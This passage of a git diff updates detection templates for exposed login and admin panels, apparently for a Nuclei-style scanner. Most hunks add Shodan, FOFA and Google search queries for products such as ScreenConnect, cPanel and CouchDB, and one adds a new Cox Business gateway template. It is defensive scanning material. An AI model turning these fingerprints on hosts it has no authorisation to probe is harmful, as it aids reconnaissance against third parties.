cpe:2.3:o:compal:ch7465lg_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ch7465lg_firmware vendor: compal + product: ch7465lg_firmware tags: panel,compal http: @@ -25,4 +25,4 @@ http: words: - "" part: body -# digest: 4b0a00483046022100e38958d3171e1b253e73fc9f13cc7b630669e5cd9e143afd61996de78258c10b0221008c0cdc84617c8f95af4977df346e715002b08dd58819cce889d534571b4ec68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddb8ae4a8c3e2e235a729a7796721810b1f6ce55ce9d76a8456c25a5a76dae15022015e1a01492ad8228d131fe0f853ccd2270020474914f99523c8bf45d88c6d031:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/compalex-panel-detect.yaml b/http/exposed-panels/compalex-panel-detect.yaml index f741dd8e85..5c456f1327 100644 --- a/http/exposed-panels/compalex-panel-detect.yaml +++ b/http/exposed-panels/compalex-panel-detect.yaml @@ -7,10 +7,10 @@ info: reference: - http://compalex.net/ metadata: + verified: true max-request: 15 shodan-query: title:"COMPALEX" - verified: true - tags: tech,php,compalex,sql + tags: tech,php,compalex,sql,panel http: - method: GET @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203f2d7f7f9157a8d2a5620417f2493ade6413463d3c7fa5572647119700b52256022100cb2d468e2a5c7503f3936717e454be526b55a0d9f89b7fc776ec8be8bb2efe80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b4df4c351195049490e6da75397200640f1dfe082708202d08a32f2a07b67a8022100dd03d23778bc40314fb8a97094018657658f9095d0a0aff27ec090b74bf3f0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 3f4dee010d..3db0ad6654 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"CompleteView Web Client" - verified: true tags: panel,completeview http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100feb9cbaa761cc04362af2cdd9ceec51bcb43335a650fd4bcab5f1b0c88a29d7a02201176ce5a2923dca2715e958f17bae8b3cddea53f1c80c96bc397c1e7a23f3ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047bd2855216d80c01d4bc14878c0a209d48403c77b492adca3cf7031f2e598e00220205581ce7af9aea98a6251c410dd1707d074b3423be851b5fe876973d39647f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index 37dcd3d528..9c909d66bf 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -10,11 +10,21 @@ info: classification: cpe: cpe:2.3:a:concrete5:concrete5:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: concrete5 - shodan-query: http.title:"Install concrete5" - vendor: concrete5 verified: true + max-request: 2 + vendor: concrete5 + product: concrete5 + shodan-query: + - http.title:"Install concrete5" + - cpe:"cpe:2.3:a:concrete5:concrete5" + - http.title:"install concrete5" + - http.title:"concrete5" + fofa-query: + - title="install concrete5" + - title="concrete5" + google-query: + - intitle:"concrete5" + - intitle:"install concrete5" tags: panel,install,concrete,cms,concrete5 http: @@ -42,4 +52,4 @@ http: group: 1 regex: - 'Version ([0-9.]+)' -# digest: 4b0a00483046022100b4df532a2b280cc7d125c47b9f4156f64c2bb6b1b4e8980b1850a97db58e08d2022100e43c6b56c6fd28fe33a721af0edb1783a666381d6ba6bdb1ed1da471960d42b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c18ee89e6afa2c4ad9207b8b392d54e5195583ea8cc432835806ac64951d7f80220038802a551ff843567b891adf4bf883c952d8fbc1b6835ffb8f34e7ff63fb1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 0f4f85df24..25aca98066 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:concrete5:concrete5:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: concrete5 - shodan-query: http.title:"concrete5" vendor: concrete5 + product: concrete5 + shodan-query: + - http.title:"concrete5" + - cpe:"cpe:2.3:a:concrete5:concrete5" + - http.title:"install concrete5" + fofa-query: + - title="install concrete5" + - title="concrete5" + google-query: + - intitle:"concrete5" + - intitle:"install concrete5" tags: panel,concrete5,cms http: @@ -38,4 +47,4 @@ http: regex: - 'content="concrete5 \- ([0-9.]+)"\/>' - 'Version ([0-9.]+)' -# digest: 4a0a00473045022100a76480260f82e5ab0418499d4fb84da861ffb38cec4d0d87c4f2c67b4eff6678022007813f04b3a486db718b43c78d917f588fd1f953cd53405c0aeaa0c4259de347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015f25608530b602648424e78a0d3a60177f9c57e3b3e4f3ce19f84b9f5aaee7502200d944eb9830b84d2f6c8355c7714045228128b299015df2065e5a543a5c7aabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index a06eb455ff..dec7122dc5 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:upc:connect_box_eurodocsis_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: connect_box_eurodocsis_firmware - shodan-query: NET-DK/1.0 - vendor: upc verified: true + max-request: 1 + vendor: upc + product: connect_box_eurodocsis_firmware + shodan-query: + - NET-DK/1.0 + - net-dk/1.0 tags: panel,connectbox,iot,upc http: @@ -40,4 +42,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022029aadecea6f4ca60ecf6a2f953fea97328f04d2b8610556f5edb7a3a14d15ef502205ece5ab52fc0172cb76bd33cb293699739fdce7bc6853e896e5855ceff45d321:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bec0d69e021aa6ba6dba346463363fb94a5581787b2ac873132a6ef7d8c1a0902210092803f238ae9834750d0a70a94520fbfa592c0c64db28ccb809aace9ec81a867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index 748def1c77..1ee2798988 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.component:zk http.title:"Server Backup Manager" - verified: true tags: panel,connectwise,backup http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b7bfc9449f8dba8dfb74a3aa61531fb6949965541e5635f8270fe1a4885c2c20220187866d9db113f5100cbc6bded4ec7144e986263b1eb968647d8e3dd43f065a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fbb268f013f3e3a66f950b36278457374d4cf8136385a45b03143a3735d3600102204261e0b9295d08e6431426adcbe871c71e3213cc0d240004a6f58c9372b39867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/connectwise-panel.yaml b/http/exposed-panels/connectwise-panel.yaml index 75feb4ba0f..a6ef9ca985 100644 --- a/http/exposed-panels/connectwise-panel.yaml +++ b/http/exposed-panels/connectwise-panel.yaml @@ -9,11 +9,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: connectwise product: screenconnect shodan-query: http.favicon.hash:-82958153 - vendor: connectwise - verified: true + fofa-query: + - app="screenconnect-remote-support-software" + - icon_hash=-82958153 + hunter-query: app.name="connectwise screenconnect software" + zoomeye-query: app:"screenconnect remote management software" tags: screenconnect,panel,connectwise,detect http: @@ -41,4 +46,4 @@ http: part: header kval: - Server -# digest: 4b0a00483046022100d05ba36a428857eabed768cdf6b953c8b3e6f13d09e8b282c2383b3fddd0dc3f022100f136fcfb37ac3fd1a6bd8ce87a25b7dac333faf61242945688c86d0ce0db70cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e90dd8f92b0151ef50ffbc4363e068e5e33275c3a4a645c26269eb660a85f635022064a31e9ffdd798bf5d23c109e2238a32a1e8b25b619618e491724e153b8c3ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index 5a7d1ef6d3..cb2cff458d 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: contao - shodan-query: http.html:"Contao Open Source CMS" - vendor: contao verified: true + max-request: 1 + vendor: contao + product: contao + shodan-query: + - http.html:"Contao Open Source CMS" + - http.title:"contao" + - http.html:"contao open source cms" + - cpe:"cpe:2.3:a:contao:contao" + fofa-query: + - title="contao" + - body="contao open source cms" + google-query: intitle:"contao" tags: panel,contao http: @@ -34,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013599876e24c999635966d9824b931552d3d65242bc11bec539865651a6680a302201b4a48d65bec98cec8ee1037b2ed65f4c82a8398eed06d6405a756c90dfb453e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ece3f3b3a0e419eebb6942ac252d990a5016eb2df60d7087d80588bd1726a414022000fe6c7f3b5f2ac99a5503097fc4cd61e58fc5c0974dbf723a2c3b7860754376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 4d85515401..f637709506 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"Content Central Login" - verified: true tags: panel,content-central http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201aeb0201b23c1d3893eede7387314055996ef0d195bd877f8e0d3fe32b26c85e0220617523d27eb0f13bb57e2ca9ec742ad5134f423172b26bc4f4e5d5c2e08965fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b48f99fac41e5b85eca89bba811a865f7d7bf8a61a2df1c2cf67601541489c26022100d3b24d415e9a28366cedad00509aa88d26ad57e6ad9d0611f565cc93b6f9a001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 7f18a54ba0..97c47ee8cd 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:corebos:corebos:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: corebos product: corebos shodan-query: http.html:"corebos" - vendor: corebos - verified: true + fofa-query: body="corebos" tags: panel,corebos http: @@ -32,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204d65eece451a675cc7b41015e41f30a28358f3f23bb9deed0a323f019c26f18e02207246f8e0416a2c536637eedf70e9538132f8920027637f9b1e249081e68ff5c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1f80722bfab8e706991c3616e6517f7b06fc4f33781c104339395a964e9e26a022100ae542549aaa3038330125ca80c5a80fcb0836beee923a28d6b72f399f485d844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index e4d8cb7caf..36e561e3bf 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:paloaltonetworks:cortex_xsoar:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cortex_xsoar - shodan-query: http.title:"Cortex XSOAR" vendor: paloaltonetworks + product: cortex_xsoar + shodan-query: + - http.title:"Cortex XSOAR" + - http.title:"cortex xsoar" + fofa-query: title="cortex xsoar" + google-query: intitle:"cortex xsoar" tags: panel,soar,login,paloaltonetworks http: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220306b38d3da33a32702c4d4b615b4ddabe5da9396b4932d72d5a9bc1bb787e5b1022100ce07548fbbafa373de1322913de297ff1bdc7584d048790a7a7625244ba55996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c108dc7a3c7fe10e64a8cd6cf43c3414155f2d3414d8344ad8d694c990ff9dca0221009496f2ecce46901ac1f3572c0eddda0b9557a954fa197e10903649ce66f56273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index 48dd5fd207..3db495f53d 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: couchdb vendor: apache + product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: panel,couchdb,apache http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202460dc58be10e57f100b410c936566550b450b09ba63c9bae5f1d4154febff0d022100933ab91c370c6a865a941d02ada1ad45639d3eb05571de02ffeb974402aae792:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091857b85d26f6ab315ab04c37d810bf62c13b774f8f249271efec759d89fec190221009aa1d9bdf6bed5ea38631ecefd32d2b4eefe6f6fe2bfe28c5d1300799c90d9c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index e4288cd1d3..c58e076233 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: couchdb vendor: apache + product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: panel,apache,couchdb http: @@ -24,4 +27,4 @@ http: - type: word words: - 'Project Fauxton' -# digest: 490a0046304402202cbaa7f07838499e65f8c672fff2e7622914e0d9e01b3d0e56640a35a4be956802201c33a3272ca122356d5063a95156dd7510eceaae7d635e428e7b22ad310d908e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056788110767aed1cc3b6d38e77e30a8fd0f120a53102503ff652d0ef72f300ff022003950d2da110500224fda4622da4286e43a9d55453f8fa9ddbfdb5ad65bbce70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml new file mode 100644 index 0000000000..442fbaaded --- /dev/null +++ b/http/exposed-panels/cox-business-panel.yaml @@ -0,0 +1,35 @@ +id: cox-business-panel + +info: + name: Cox Business Dominion Gateway Login Panel - Detect + author: DhiyaneshDK + severity: info + description: | + Cox Business Dominion Gateway Login page was discovered. + reference: + - https://samcurry.net/hacking-millions-of-modems + metadata: + verified: true + max-request: 1 + shodan-query: html:"Cox Business" + tags: cox,gateway,login,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cox Business Dominion Gateway - Login" + + - type: status + status: + - 200 +# digest: 4a0a0047304502202f0783850ff8e6ce5bd1c7ae9410397ff875b5faf3b291ac333da2a618508828022100e296680b28b7dd0221e526c5cf495d4308078f39630e99d450aca0a6ba76eddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index 1cd654880a..6acaf492fa 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cpanel - shodan-query: title:"CPanel - API Codes" - vendor: cpanel verified: true + max-request: 1 + vendor: cpanel + product: cpanel + shodan-query: + - title:"CPanel - API Codes" + - http.title:"cpanel" + - cpe:"cpe:2.3:a:cpanel:cpanel" + - http.title:"cpanel - api codes" + fofa-query: + - title="cpanel - api codes" + - title="cpanel" + google-query: + - intitle:"cpanel - api codes" + - intitle:"cpanel" tags: panel,cpanel http: @@ -36,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022077cd849c38cea5a2c415736a022a06de8792ec0999d3615cd1f5438720d1d2cb02210084437d0ed80eaf269a47d8fd6dc57b26037337487fba621b13e324a55640ec73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220025a11e1d8b1932625a7ded7948109d8d5a8451156980b2713b99284f28ae32d022100f9c3ea0c557809e6ee79a9736b7aa4b53d301b7211f99c3a5ade7ce3e92c61a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index 1c26ff0ad2..b6acd96dc0 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:craft_cms:*:*:* metadata: max-request: 1 - product: seomatic - shodan-query: 'X-Powered-By: Craft CMS' vendor: nystudio107 + product: seomatic + shodan-query: + - 'X-Powered-By: Craft CMS' + - "x-powered-by: craft cms" + - 'x-powered-by: craft cms html:"seomatic"' tags: panel,craftcms,nystudio107 http: @@ -32,4 +35,4 @@ http: part: body words: - '<\/script>' -# digest: 4a0a004730450220231ddbcaf05bd0329bfb2861daed264872423a67ab82390e7e9af65a07253f57022100cc7ef97bb7152bff2132f77dc1b66995db259d97dc2152a56a839bb04015cb9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092d66e6ad353bf88679ea00a2f59c7b639945152608ddeefecce9ac7d536692002203f5b1512c25d8b18e7af6e51a7622662fc1072a853cf405ba4a6cabad64864d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dahua-web-panel.yaml b/http/exposed-panels/dahua-web-panel.yaml index b669d439bc..1c830b1686 100644 --- a/http/exposed-panels/dahua-web-panel.yaml +++ b/http/exposed-panels/dahua-web-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1653394551 - verified: true tags: edb,panel,dahua,detect http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220397b44e33c005a8764cb81d187bda04ef52ca18080f5438267606c8dc0403aa202205dc4369881b4e69358e0cd5e3276fef2731978544dd60ed44acd6afbde4f6694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202439e0b33f565bb29d258453ea7975fc89f2540acdee02604e1512c585b3d2690220406689fe81cab29d8748aea5ab8e8f9980077909750197e7c6b834046d75461b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index 84ddc7d128..cc7abface2 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:darktrace:threat_visualizer:*:*:*:*:android:*:*:* metadata: - max-request: 1 - product: threat_visualizer - shodan-query: html:"Darktrace Threat Visualizer" - vendor: darktrace verified: true + max-request: 1 + vendor: darktrace + product: threat_visualizer + shodan-query: + - html:"Darktrace Threat Visualizer" + - http.html:"darktrace threat visualizer" + fofa-query: body="darktrace threat visualizer" tags: panel,darktrace http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b117d9966e85ca8dc4f53d3ef8857181afa1a939670d2433bacfc689ecc83b8022100fb6ebf975b53c5992928c3b737655a144e6a0af155ec3fc651f9a6f425602b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f3a8af104b9dde7f3db6f51e29e25d0cacd59dc60dd5ac03c470ac29602f2ac02202ff6a50159ca33fed417915a336224787b3a628930320bd2fd776f2122adbbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dashy-panel.yaml b/http/exposed-panels/dashy-panel.yaml index 6c8b6850c3..4a5324b0aa 100644 --- a/http/exposed-panels/dashy-panel.yaml +++ b/http/exposed-panels/dashy-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:dashy:dashy:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: dashy product: dashy shodan-query: http.favicon.hash:-1013024216 - vendor: dashy - verified: true + fofa-query: icon_hash=-1013024216 tags: panel,dashy,detect http: @@ -35,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3b64d03bf58ff86ebb77624b3f4b8f1e6970267d2130f6f5767e4676e35eb130220037ea0c922c9e0041053ea3fdd6fd97ae92839109c2ac7a7cf9183b44580912d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029440aec88ab9ccf4da1990ee1ea74e822175729820ec74261ba0b93e2cd972902200f650af9584d79091244a03b6777185d18278e3ff898c2ef3db43e167e4d14ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 4aded9b958..5df9ea352a 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Datadog" - verified: true tags: panel,datadog http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040b91eb13424cf198734769a7373cb8177d45baec828b1bca4cbbee7832c372d02207bf045cc446ee34a3d6da19aeca495fe794a4f9e034ed41d0f43418df4a64c4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba1b4c42b4f95dc002c1b389ce707cd8156e659b7458b3d0c237caafb2a8e7cd0221009c89ebdb1c3767b1f5b131ee5002ff00cdf083939259bed505bd0eaf1bc78ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dataease-panel.yaml b/http/exposed-panels/dataease-panel.yaml index 2f077d329d..296e17e2f0 100644 --- a/http/exposed-panels/dataease-panel.yaml +++ b/http/exposed-panels/dataease-panel.yaml @@ -11,11 +11,14 @@ info: classification: cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dataease - shodan-query: html:"Dataease" - vendor: dataease verified: true + max-request: 1 + vendor: dataease + product: dataease + shodan-query: + - html:"Dataease" + - http.html:"dataease" + fofa-query: body="dataease" tags: login,panel,dataease http: @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab974518fc45b06d7a3a6fce97a69772da8d341cb130009593d5f9f10939f563022100d16e71fd20628009f748f93ded21d8643cd34c23ecfc00447bf2533c946d65d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100862d589284943e34778a6a616407a01e9381049bf3ad1d2a8326c8a46d3760bc02207da8441d4eaa65d4214421fbe1533709514c9ce2aa3b76c92187d7a02611467b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 0da072a99d..1f68d630b0 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"dataiku" - verified: true tags: panel,dataiku http: @@ -29,4 +29,4 @@ http: part: header words: - "text/html" -# digest: 490a0046304402200628eddb62ad05dca3bb0da5c19dc6f5319a3af1ce2c53b53defbfe7a4b54b3a0220519be27ab5a3230eb8263e9b729ca3d9be39fa1d518258c329da94c30557369f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf930e53c220ef10054e30544f10f8da6c39735dc37a4fcb5617e89b846126560220587db0c30779629768374cc267eba9fa2a4cb539b19afdfd1fadb68af537d6ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index 6b2fa8b95e..308d27be4f 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Davantis" - verified: true tags: panel,davantis http: @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022062dbea54f4204fbfcc81bbb9b2801d96c631b5892f9d4c45e06c2ac12cb2e5e1022068e7b3212cd4a0f5fafe1ae80e5266e49946cba37e2b40d48456c9f17737c681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053853afb1fa9d70559f6b89e920efa79c1375023a9e222d172f6d2dd44782f28022100f0ae424cd16c1f1879de99d506e19cc24805ac4011cf592219da2f0a201b1552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index 1dcf171ee4..c769ff92de 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:daybydaycrm:daybyday:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: daybyday - shodan-query: http.title:"Daybyday" vendor: daybydaycrm + product: daybyday + shodan-query: + - http.title:"Daybyday" + - http.title:"daybyday" + fofa-query: title="daybyday" + google-query: intitle:"daybyday" tags: panel,daybyday,daybydaycrm http: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cbf712245b4825ddf753f674d56f792f859e83d5fb72d37eec7a702d7b203a1022100e436ec52240192c77e0aeecdf44cd857b2fc978d35b8b24bc2d272f64530d933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f06b8237f3ded431b1d66e30ee6db83e537461d38d34442a340264fb51657f4022100b621a48e3c38b18477c37d6c28615b19e960ec1767aa72e9bdb81f2386e80f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dell-bmc-panel-detect.yaml b/http/exposed-panels/dell-bmc-panel-detect.yaml index b50e9c7850..3b526c4639 100644 --- a/http/exposed-panels/dell-bmc-panel-detect.yaml +++ b/http/exposed-panels/dell-bmc-panel-detect.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dell Remote Management Controller" - verified: true tags: panel,bmc,dell,login http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205b25e3817212eb779bbf8f345bd662d126235dc77066b84907a0e6392a3b014a02204d6ccf85adac98bb0b0ec6b7f29b9733e44826ef55237b3a9a041e330ff39566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa1fe7261140ee75a539d7765e780cf8e5f564026ca0f98c7cae7e3f06c9ddc40221008ea0e973dafb34e00fe3e175605622c53652509e3e7af3d8c5fedc221a85e987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 